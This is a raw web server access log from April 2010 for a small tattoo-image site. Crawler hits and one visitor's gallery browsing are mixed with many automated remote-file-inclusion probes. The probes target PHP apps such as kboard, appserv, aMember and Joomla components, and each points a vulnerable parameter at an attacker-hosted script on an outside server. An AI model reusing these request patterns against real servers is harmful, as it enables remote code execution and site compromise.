77.221.130.13 - - [20/Apr/2010:11:36:17 -0500] "GET /logs/access_log.1219708800///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:11:36:37 -0500] "GET //inc/header.php/step_one.php?server_inc=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:11:36:37 -0500] "GET /logs/access_log.1237334400//inc/header.php/step_one.php?server_inc=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:11:36:40 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:11:37:14 -0500] "GET /logs/access_log.1219708800///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.13.89 - - [20/Apr/2010:11:37:27 -0500] "GET /logs/access_log.1228953600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.69.115.198 - - [20/Apr/2010:11:38:45 -0500] "GET /logs/access_log.1212969600///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:11:39:00 -0500] "GET ///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:11:39:01 -0500] "GET /logs/access_log.1215648000///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.82.117.81 - - [20/Apr/2010:11:39:01 -0500] "GET /logs///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:39:11 -0500] "GET /logs/access_log.1219363200///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:11:40:11 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.195.112.180 - - [20/Apr/2010:11:40:23 -0500] "GET /logs/access_log.1263081600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.208.34.38 - - [20/Apr/2010:11:40:29 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:40:58 -0500] "GET /logs/access_log.1212969600///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.160.17.201 - - [20/Apr/2010:11:43:12 -0500] "GET //main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:12 -0500] "GET /logs/access_log.1268265600//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:12 -0500] "GET /logs//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:27 -0500] "GET /logs/access_log.1268265600//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:27 -0500] "GET /logs//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:27 -0500] "GET //main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:33 -0500] "GET /logs//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:33 -0500] "GET /logs/access_log.1268265600//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:43:33 -0500] "GET //main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:45:37 -0500] "GET /logs/access_log.1219363200//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:45:56 -0500] "GET /logs/access_log.1219363200//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.160.17.201 - - [20/Apr/2010:11:45:58 -0500] "GET /logs/access_log.1219363200//main.php?sayfa=http://sabong.es.kr/~sb2007/bbs/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.168.176.11 - - [20/Apr/2010:11:52:56 -0500] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:52:56 -0500] "GET //appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:52:56 -0500] "GET /logs/access_log.1264723200//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:53:18 -0500] "GET /logs/access_log.1263168000//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:53:37 -0500] "GET //appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:53:37 -0500] "GET /logs/access_log.1264723200//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:53:37 -0500] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:11:53:37 -0500] "GET /logs/access_log.1263168000//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:54:50 -0500] "GET ///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:54:50 -0500] "GET /logs///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.168.176.11 - - [20/Apr/2010:11:54:50 -0500] "GET /logs/access_log.1270684800///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:42 -0500] "GET /logs/access_log.1219708800%20%20///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:42 -0500] "GET ///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:42 -0500] "GET /logs///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:43 -0500] "GET ///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:43 -0500] "GET /logs///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:11:57:43 -0500] "GET /logs/access_log.1219708800%20%20///amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:00:55 -0500] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:00:55 -0500] "GET /logs/access_log.1264723200//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:00:55 -0500] "GET //appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:00:55 -0500] "GET /logs/access_log.1263168000//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:12:07:56 -0500] "GET /logs/access_log.1270684800///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:12:07:56 -0500] "GET ///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
77.221.130.13 - - [20/Apr/2010:12:07:56 -0500] "GET /logs///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.52.143.33 - - [20/Apr/2010:12:09:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.33 - - [20/Apr/2010:12:09:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
87.250.255.243 - - [20/Apr/2010:12:09:57 -0500] "GET /logs/access_log.1270944000 HTTP/1.1" 200 708888 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [20/Apr/2010:12:10:59 -0500] "GET /logs/access_log.1265760000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 361 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:12:10:59 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 339 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:12:10:59 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:12:11:52 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.105.175.132 - - [20/Apr/2010:12:12:17 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.105.175.132 - - [20/Apr/2010:12:12:17 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
78.105.175.132 - - [20/Apr/2010:12:12:17 -0500] "GET /logs/access_log.1265760000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
66.221.63.33 - - [20/Apr/2010:12:12:25 -0500] "GET /logs/access_log.1268265600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:12:13:09 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.60.108.96 - - [20/Apr/2010:12:13:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=vintage+tattoo+flash&btnG=Google+Search""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:42 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:13:59 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
75.60.108.96 - - [20/Apr/2010:12:14:00 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
78.105.175.132 - - [20/Apr/2010:12:14:57 -0500] "GET /logs/access_log.1268265600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:12:15:04 -0500] "GET /logs/access_log.1248134400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:17:04 -0500] "GET /logs/access_log.1164758400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:19:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:20:58 -0500] "GET /logs/access_log.1176854400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:22:53 -0500] "GET /logs/access_log.1261872000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.145 - - [20/Apr/2010:12:23:28 -0500] "GET /logs/access_log.1262995200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:12:23:31 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:24:48 -0500] "GET /logs/access_log.1244937600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:27:21 -0500] "GET /logs/access_log.1236384000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.69.115.198 - - [20/Apr/2010:12:27:34 -0500] "GET /logs///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:27:34 -0500] "GET ///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
83.69.115.198 - - [20/Apr/2010:12:27:35 -0500] "GET /logs/access_log.1270684800///coppercop/theme.php?THEME_DIR=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.46.42.233 - - [20/Apr/2010:12:27:49 -0500] "GET /logs/access_log.1219708800%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
78.46.42.233 - - [20/Apr/2010:12:27:49 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.46.42.233 - - [20/Apr/2010:12:27:49 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:12:29:16 -0500] "GET /logs/access_log.1161475200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [20/Apr/2010:12:29:46 -0500] "GET /logs/xGB.php?act=admin&do=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:12:29:53 -0500] "GET /xGB.php?act=admin&do=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.208.34.38 - - [20/Apr/2010:12:29:54 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.195.112.180 - - [20/Apr/2010:12:30:01 -0500] "GET /logs/access_log.1154476800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:12:30:33 -0500] "GET /logs/access_log.1170115200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [20/Apr/2010:12:31:14 -0500] "GET /logs/access_log.1270598400/xGB.php?act=admin&do=http://snsecrets.com/please/confirm/cunfirm/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.13.48 - - [20/Apr/2010:12:32:30 -0500] "GET /logs/access_log.1250812800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:12:33:06 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:34:22 -0500] "GET /logs/access_log.1269302400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:12:36:17 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.233.76.78 - - [20/Apr/2010:12:36:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.834"
72.233.76.78 - - [20/Apr/2010:12:36:27 -0500] "GET /logs/access_log.1238803200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.834"
72.233.76.78 - - [20/Apr/2010:12:36:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.834"
84.38.160.77 - - [20/Apr/2010:12:37:33 -0500] "GET /logs/access_log.1238803200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 362 "-""libwww-perl/5.76"
84.38.160.77 - - [20/Apr/2010:12:37:33 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
